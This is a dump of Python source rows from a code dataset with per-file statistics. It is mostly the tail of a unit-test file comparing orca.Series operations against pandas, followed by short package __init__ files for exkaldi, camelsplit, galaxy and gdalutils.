{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rdiv(psb)
c2 = os.rdiv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rdiv(psb, axis=0)
c2 = os.rdiv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rdiv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rdiv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rdiv(osb, axis=1)
def test_series_binary_operator_function_rtruediv_scalar(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rtruediv(1)
c2 = os.rtruediv(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rtruediv_list(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
c1 = ps.rtruediv([1, 2, 12, 10])
c2 = os.rtruediv([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rtruediv_series(self):
ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rtruediv(psb)
c2 = os.rtruediv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rtruediv(psb, axis=0)
c2 = os.rtruediv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rtruediv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rtruediv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rtruediv(osb, axis=1)
def test_series_binary_operator_function_rfloordiv_scalar(self):
# TODO: 负数的差异
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rfloordiv(1)
c2 = os.rfloordiv(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rfloordiv_list(self):
# TODO: 负数的差异
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rfloordiv([1, 2, 12, 10])
c2 = os.rfloordiv([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rfloordiv_series(self):
# TODO: 负数的差异
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rfloordiv(psb)
c2 = os.rfloordiv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rfloordiv(psb, axis=0)
c2 = os.rfloordiv(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rfloordiv(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rfloordiv(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rfloordiv(osb, axis=1)
def test_series_binary_operator_function_rmod_scalar(self):
# TODO: 负数的差异
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmod(1)
c2 = os.rmod(1).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmod_list(self):
# TODO: 负数的差异
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rmod([1, 2, 12, 10])
c2 = os.rmod([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rmod_series(self):
# TODO: 负数的差异
# ps = pd.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
# os = orca.Series([10, 1, 19, -5], index=['a', 'b', 'c', 'd'])
ps = pd.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 19, 5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rmod(psb)
c2 = os.rmod(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=0
c1 = ps.rmod(psb, axis=0)
c2 = os.rmod(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rmod(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rmod(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rmod(osb, axis=1)
def test_series_binary_operator_function_rpow_scalar(self):
ps = pd.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rpow(4)
c2 = os.rpow(4).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rpow_list(self):
ps = pd.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
c1 = ps.rpow([1, 2, 12, 10])
c2 = os.rpow([1, 2, 12, 10]).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
def test_series_binary_operator_function_rpow_series(self):
ps = pd.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
os = orca.Series([10, 1, 9.0, 5], index=['a', 'b', 'c', 'd'])
psb = pd.Series([1, 2, 12, 10.0, 11], index=['a', 'a', 'b', 'c', 'd'])
osb = orca.Series([1, 2, 12, 10.0, 11], index=['a', 'a', 'b', 'c', 'd'])
pdf = pd.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
odf = orca.DataFrame(
{'float': [1.0, 2.0, 3.5, 6.5], 'int': [1, 2, 7, 4], 'datetime': pd.date_range('2019-01-02', periods=4),
'string': ['foo', 'ss', 'sw', 'qa']}, index=['a', 'b', 'c', 'c'])
# series with series
# default axis=0
c1 = ps.rpow(psb)
c2 = os.rpow(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False, check_less_precise=1)
# specify axis=0
c1 = ps.rpow(psb, axis=0)
c2 = os.rpow(osb).to_pandas()
assert_series_equal(c1, c2, check_dtype=False)
# specify axis=1, ValueError expected
TODO: orca.Series.rpow(orca.Series(), axis=1)
# msg = "No axis named 1 for object type <class 'pandas.core.series.Series'>"
# with self.assertRaisesRegex(ValueError, msg):
# ps.rpow(psb, axis=1)
# with self.assertRaisesRegex(ValueError, msg):
# os.rpow(osb, axis=1)
def test_series_binary_operator_function_combine(self):
ps1 = pd.Series({'falcon': 330.0, 'eagle': 160.0})
ps2 = pd.Series({'falcon': 345.0, 'eagle': 200.0, 'duck': 30.0})
os1 = orca.Series({'falcon': 330.0, 'eagle': 160.0})
os2 = orca.Series({'falcon': 345.0, 'eagle': 200.0, 'duck': 30.0})
# TODO: orca.Series().combine()
# c1 = ps1.combine(os2, max)
# c2 = os1.combine(ps2, max)
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_combine_first(self):
ps1 = pd.Series([1, np.nan])
ps2 = pd.Series([3, 4])
os1 = orca.Series([1, np.nan])
os2 = orca.Series([3, 4])
# TODO: orca.Series().combine_first()
# c1 = ps1.combine_first(os2)
# c2 = os1.combine_first(ps2)
# assert_series_equal(c1, c2)
def test_series_binary_operator_function_round(self):
ps = pd.Series([0.1, 1.3, 2.7])
os = orca.Series([0.1, 1.3, 2.7])
# TODO: orca.Series().round()
c1 = ps.round(1)
c2 = os.round(1)
assert_series_equal(c1, c2.to_pandas())
pser = pd.Series([0.028208, 0.038683, 0.877076], name='x')
oser = orca.Series(pser)
# TODO: TypeError expected: integer argument expected, got float
# msg = "integer argument expected, got float"
# with self.assertRaisesRegex(TypeError, msg):
# pser.round(1.5)
# with self.assertRaisesRegex(TypeError, msg):
# oser.round(1.5)
@property
def psla(self):
return pd.Series({'dog': 1, 'cat': 2, 'pig': 3, 'cow': 4}, index=['dog', 'cat', 'pig', 'cow'])
@property
def pslb(self):
return pd.Series({'dog': 1, 'cat': 3, 'pig': 2, 'cow': 5}, index=['dog', 'cat', 'pig', 'cow'])
@property
def osla(self):
return orca.Series({'dog': 1, 'cat': 2, 'pig': 3, 'cow': 4}, index=['dog', 'cat', 'pig', 'cow'])
@property
def oslb(self):
return orca.Series({'dog': 1, 'cat': 3, 'pig': 2, 'cow': 5}, index=['dog', 'cat', 'pig', 'cow'])
def test_series_binary_operator_function_lt(self):
# other = scalar value
pc1 = self.psla.lt(3)
oc1 = self.osla.lt(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.lt(self.pslb)
oc2 = self.osla.lt(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_gt(self):
# other = scalar value
pc1 = self.psla.gt(3)
oc1 = self.osla.gt(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.gt(self.pslb)
oc2 = self.osla.gt(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_le(self):
# other = scalar value
pc1 = self.psla.le(3)
oc1 = self.osla.le(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.le(self.pslb)
oc2 = self.osla.le(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_ge(self):
# other = scalar value
pc1 = self.psla.ge(3)
oc1 = self.osla.ge(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.ge(self.pslb)
oc2 = self.osla.ge(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_ne(self):
# other = scalar value
pc1 = self.psla.ne(3)
oc1 = self.osla.ne(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.ne(self.pslb)
oc2 = self.osla.ne(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_eq(self):
# other = scalar value
pc1 = self.psla.eq(3)
oc1 = self.osla.eq(3).to_pandas()
assert_series_equal(pc1, oc1)
# other = Series
pc2 = self.psla.eq(self.pslb)
oc2 = self.osla.eq(self.oslb).to_pandas()
assert_series_equal(pc2, oc2)
def test_series_binary_operator_function_product(self):
# TODO: orca.Series().prod()
pc1 = pd.Series([1]).prod()
# oc1 = orca.Series([1]).prod()
# assert_series_equal(pc1, oc1)
#
# pc2 = pd.Series([]).prod()
# oc2 = orca.Series([]).prod()
# assert_series_equal(pc2, oc2)
#
# pc3 = pd.Series([np.nan]).prod()
# oc3 = orca.Series([np.nan]).prod()
# assert_series_equal(pc3, oc3)
def test_series_binary_operator_function_dot(self):
ps = pd.Series([0, 1, 2, 3])
psother = pd.Series([-1, 2, -3, 4])
os = orca.Series([0, 1, 2, 3])
osother = orca.Series([-1, 2, -3, 4])
# TODO: orca.Series().dot()
# # dot with series
# pc1 = ps.dot(psother)
# pc2 = ps @ psother
# oc1 = os.dot(osother)
# oc2 = os @ osother
# assert_series_equal(pc1, oc1)
# assert_series_equal(pc2, oc2)
#
# # dot with dataframe
# pdfn = pd.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
# odfn = orca.DataFrame([[0, 1], [-2, 3], [4, -5], [6, 7]])
# pc1 = ps.dot(pdfn)
# pc2 = ps @ pdfn
# oc1 = os.dot(odfn)
# oc2 = os @ odfn
# assert_series_equal(pc1, oc1)
# assert_series_equal(pc2, oc2)
#
# # dot with array
# arr = np.array([[0, 1], [-2, 3], [4, -5], [6, 7]])
# pc1 = ps.dot(arr)
# pc2 = ps @ arr
# oc1 = os.dot(arr)
# oc2 = os @ arr
# assert_series_equal(pc1, oc1)
# assert_series_equal(pc2, oc2)
def test_series_function_application_groupby_window_ewm(self):
ewmp = self.ps.ewm(com=0.5)
ewmo = self.os.ewm(com=0.5)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
# TODO: pairwise
# assert_series_equal(ewmp.corr(), ewmo.corr().to_pandas())
# assert_series_equal(ewmp.cov(), ewmo.cov().to_pandas())
ewmp = self.ps.ewm(span=5)
ewmo = self.os.ewm(span=5)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
ewmp = self.ps.ewm(halflife=7)
ewmo = self.os.ewm(halflife=7)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
ewmp = self.ps.ewm(alpha=0.2)
ewmo = self.os.ewm(alpha=0.2)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
ewmp = self.ps.ewm(alpha=0.7, min_periods=2, adjust=False, ignore_na=True)
ewmo = self.os.ewm(alpha=0.7, min_periods=2, adjust=False, ignore_na=True)
assert_series_equal(ewmp.mean(), ewmo.mean().to_pandas())
assert_series_equal(ewmp.std(), ewmo.std().to_pandas())
assert_series_equal(ewmp.var(), ewmo.var().to_pandas())
def test_series_missing_data_handling_fillna(self):
ps = pd.Series([np.nan, 2, 3, 4, np.nan, 6], name='x')
os = orca.Series(ps).to_pandas()
self.assertEqual(repr(os.fillna(0)), repr(ps.fillna(0)))
os.fillna(0, inplace=True)
ps.fillna(0, inplace=True)
assert_series_equal(os, ps)
def test_series_missing_data_handling_dropna(self):
ps = pd.Series([np.nan, 2, 3, 4, np.nan, 6], name='x')
os = orca.Series(ps)
# TODO:NOT IMPLEMENTED
# assert_series_equal(os.dropna().to_pandas(), ps.dropna())
#
# os.dropna(inplace=True)
# assert_series_equal(os.to_pandas(), ps.dropna())
def test_series_missing_data_handling_isnull(self):
ps = pd.Series([1, 2, 3, 4, np.nan, 6], name='x')
os = orca.Series(ps)
self.assertEqual(repr(os.notnull().to_pandas()), repr(ps.notnull()))
self.assertEqual(repr(os.isnull().to_pandas()), repr(ps.isnull()))
ps = self.ps
os = self.os
self.assertEqual(repr(os.notnull().to_pandas()), repr(ps.notnull()))
self.assertEqual(repr(os.isnull().to_pandas()), repr(ps.isnull()))
def test_series_reshaping_sorting_sort_values(self):
ps = pd.Series([1, 2, 3, 4, 5, None, 7], name='0')
os = orca.Series([1, 2, 3, 4, 5, None, 7], name='0')
# TODO: orca.Series object has no attribute 'sort_values'
# self.assertEqual(repr(os.sort_values()), repr(ps.sort_values()))
# self.assertEqual(repr(os.sort_values(ascending=False)),
# repr(ps.sort_values(ascending=False)))
# self.assertEqual(repr(os.sort_values(na_position='first')),
# repr(ps.sort_values(na_position='first')))
# self.assertRaises(ValueError, lambda: os.sort_values(na_position='invalid'))
# self.assertEqual(os.sort_values(inplace=True), ps.sort_values(inplace=True))
# assert_series_equal(os, ps)
def test_series_combining_joining_merging_append(self):
ps1 = pd.Series([1, 2, 3], name='0')
ps2 = pd.Series([4, 5, 6], name='0')
ps3 = pd.Series([4, 5, 6], index=[3, 4, 5], name='0')
os1 = orca.Series(ps1)
os2 = orca.Series(ps2)
os3 = orca.Series(ps3)
# TODO:NOT IMPLEMENTED
# os1 = os1.append(os2)
# ps1 = ps1.append(ps2)
# ps1.equals(os1)
# self.assertTrue(ps1.equals(os1))
# os1 = os1.append(os3)
# ps1 = ps1.append(ps3)
# self.assertTrue(ps1.equals(os1))
# os1 = os1.append(os2, ignore_index=True)
# ps1 = ps1.append(ps2, ignore_index=True)
# self.assertTrue(ps1.equals(os1))
#
# os1.append(os3, verify_integrity=True)
# msg = "Indices have overlapping values"
# with self.assertRaises(ValueError, msg=msg):
# os1.append(os2, verify_integrity=True)
# def test_series_map(self):
# pser = pd.Series(['cat', 'dog', None, 'rabbit'])
# oser = orca.DataFrame(pser)
# # Currently orca doesn't return NaN as Pandas does.
# self.assertEqual(
# repr(oser.map({})),
# repr(pser.map({}).replace({pd.np.nan: None}).rename(0)))
#
# d = defaultdict(lambda: "abc")
# self.assertTrue("abc" in repr(oser.map(d)))
# self.assertEqual(
# repr(oser.map(d)),
# repr(pser.map(d).rename(0)))
| 41.51134 | 116 | 0.523353 | 9,049 | 60,399 | 3.376064 | 0.031495 | 0.062193 | 0.017774 | 0.019771 | 0.876301 | 0.845041 | 0.809755 | 0.791195 | 0.78275 | 0.731588 | 0 | 0.076446 | 0.270567 | 60,399 | 1,454 | 117 | 41.53989 | 0.616973 | 0.227338 | 0 | 0.5 | 0 | 0 | 0.048614 | 0 | 0 | 0 | 0 | 0.000688 | 0.167506 | 1 | 0.117128 | false | 0 | 0.006297 | 0.010076 | 0.138539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6ef6e28e42fcf422390698ce89a082fcc6870fd8 | 2,120 | py | Python | exkaldi/core/__init__.py | ikou-austin/exkaldi | 437dd8a121baf8e682850374df3eade5ae53fda4 | [
"Apache-2.0"
] | 1 | 2020-10-14T13:55:53.000Z | 2020-10-14T13:55:53.000Z | exkaldi/core/__init__.py | ikou-austin/exkaldi | 437dd8a121baf8e682850374df3eade5ae53fda4 | [
"Apache-2.0"
] | null | null | null | exkaldi/core/__init__.py | ikou-austin/exkaldi | 437dd8a121baf8e682850374df3eade5ae53fda4 | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from exkaldi.core.archive import ListTable
from exkaldi.core.archive import ArkIndexTable
from exkaldi.core.archive import Transcription
from exkaldi.core.archive import Metric
from exkaldi.core.archive import WavSegment
from exkaldi.core.archive import BytesFeature
from exkaldi.core.archive import BytesCMVNStatistics
from exkaldi.core.archive import BytesProbability
from exkaldi.core.archive import BytesAlignmentTrans
from exkaldi.core.archive import BytesFmllrMatrix
from exkaldi.core.archive import NumpyFeature
from exkaldi.core.archive import NumpyCMVNStatistics
from exkaldi.core.archive import NumpyProbability
from exkaldi.core.archive import NumpyAlignment
from exkaldi.core.archive import NumpyAlignmentTrans
from exkaldi.core.archive import NumpyAlignmentPhone
from exkaldi.core.archive import NumpyAlignmentPdf
from exkaldi.core.archive import NumpyFmllrMatrix
from exkaldi.core.load import load_ali
from exkaldi.core.load import load_feat
from exkaldi.core.load import load_cmvn
from exkaldi.core.load import load_prob
from exkaldi.core.load import load_transcription
from exkaldi.core.load import load_list_table
from exkaldi.core.load import load_index_table
from exkaldi.core.feature import compute_mfcc
from exkaldi.core.feature import compute_fbank
from exkaldi.core.feature import compute_plp
from exkaldi.core.feature import compute_spectrogram
from exkaldi.core.feature import transform_feat
from exkaldi.core.feature import use_fmllr
from exkaldi.core.feature import use_cmvn
from exkaldi.core.feature import compute_cmvn_stats
from exkaldi.core.feature import use_cmvn_sliding
from exkaldi.core.feature import decompress_feat
from exkaldi.core.feature import add_delta
from exkaldi.core.feature import splice_feature
from exkaldi.core.common import tuple_dataset
from exkaldi.core.common import match_utterances
from exkaldi.core.common import merge_archives
from exkaldi.core.common import utt_to_spk
from exkaldi.core.common import spk_to_utt
from exkaldi.core.common import spk2utt_to_utt2spk
from exkaldi.core.common import utt2spk_to_spk2utt
| 40 | 52 | 0.870283 | 303 | 2,120 | 5.960396 | 0.19802 | 0.267996 | 0.365449 | 0.219269 | 0.715393 | 0.285161 | 0.03876 | 0 | 0 | 0 | 0 | 0.002069 | 0.088208 | 2,120 | 52 | 53 | 40.769231 | 0.93223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3e28296b1c6e7ad3607aab1f1a8f5cf2cc1e25d0 | 43 | py | Python | camelsplit/__init__.py | flopp/camelsplit | 2383b3781e078f421b6f3ab58aca2d62bfb30c8b | [
"MIT"
] | 2 | 2020-02-09T16:05:53.000Z | 2021-05-18T08:29:36.000Z | camelsplit/__init__.py | flopp/camelsplit | 2383b3781e078f421b6f3ab58aca2d62bfb30c8b | [
"MIT"
] | null | null | null | camelsplit/__init__.py | flopp/camelsplit | 2383b3781e078f421b6f3ab58aca2d62bfb30c8b | [
"MIT"
] | null | null | null | from .camelsplit import camelsplit # noqa
| 21.5 | 42 | 0.790698 | 5 | 43 | 6.8 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162791 | 43 | 1 | 43 | 43 | 0.944444 | 0.093023 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
3e4b013d4e831bc7045491b11998a3988ad9886a | 41 | py | Python | example_pkg_py/a2.py | Ar-Ray-code/rclpy_separate_example | 6514197537555460037ce35272fa48a0655467f8 | [
"Apache-2.0"
] | null | null | null | example_pkg_py/a2.py | Ar-Ray-code/rclpy_separate_example | 6514197537555460037ce35272fa48a0655467f8 | [
"Apache-2.0"
] | null | null | null | example_pkg_py/a2.py | Ar-Ray-code/rclpy_separate_example | 6514197537555460037ce35272fa48a0655467f8 | [
"Apache-2.0"
] | null | null | null | def hello2():
print("Hello! I'm A2.") | 20.5 | 27 | 0.560976 | 7 | 41 | 3.285714 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.195122 | 41 | 2 | 27 | 20.5 | 0.636364 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
3e8eba9459eb57ec30676e9b58ba05a91a536734 | 166 | py | Python | galaxy/cartography/__init__.py | damienlancry/galaxy | b9445b1caae64aa77686ba145cd759fcf7158f08 | [
"MIT"
] | null | null | null | galaxy/cartography/__init__.py | damienlancry/galaxy | b9445b1caae64aa77686ba145cd759fcf7158f08 | [
"MIT"
] | null | null | null | galaxy/cartography/__init__.py | damienlancry/galaxy | b9445b1caae64aa77686ba145cd759fcf7158f08 | [
"MIT"
] | null | null | null | from .spotify_cartographer import SpotifyCartographer
from .youtube_cartographer import YoutubeCartographer
__all__ = ["YoutubeCartographer", "SpotifyCartographer"]
| 33.2 | 56 | 0.861446 | 13 | 166 | 10.538462 | 0.615385 | 0.262774 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.078313 | 166 | 4 | 57 | 41.5 | 0.895425 | 0 | 0 | 0 | 0 | 0 | 0.228916 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
e4a77720a1c59e064f21cd64aa79ae0bec14002b | 378 | py | Python | gdalutils/__init__.py | jsosa/gdalutils | 00275cb7415565042511c33f387cad1a90d5e3de | [
"BSD-3-Clause"
] | 1 | 2021-02-04T15:55:29.000Z | 2021-02-04T15:55:29.000Z | gdalutils/__init__.py | jsosa/gdalutils | 00275cb7415565042511c33f387cad1a90d5e3de | [
"BSD-3-Clause"
] | null | null | null | gdalutils/__init__.py | jsosa/gdalutils | 00275cb7415565042511c33f387cad1a90d5e3de | [
"BSD-3-Clause"
] | 1 | 2021-04-08T13:22:35.000Z | 2021-04-08T13:22:35.000Z | from .core import get_dataxy
from .core import get_data
from .core import get_geo
from .core import clip_raster
from .core import write_raster
from .core import pandas_to_array
from .core import pandas_to_raster
from .core import points_to_geopandas
from .core import array_to_pandas
from .core import raster_to_pandas
from .core import assign_val
from .extras import haversine
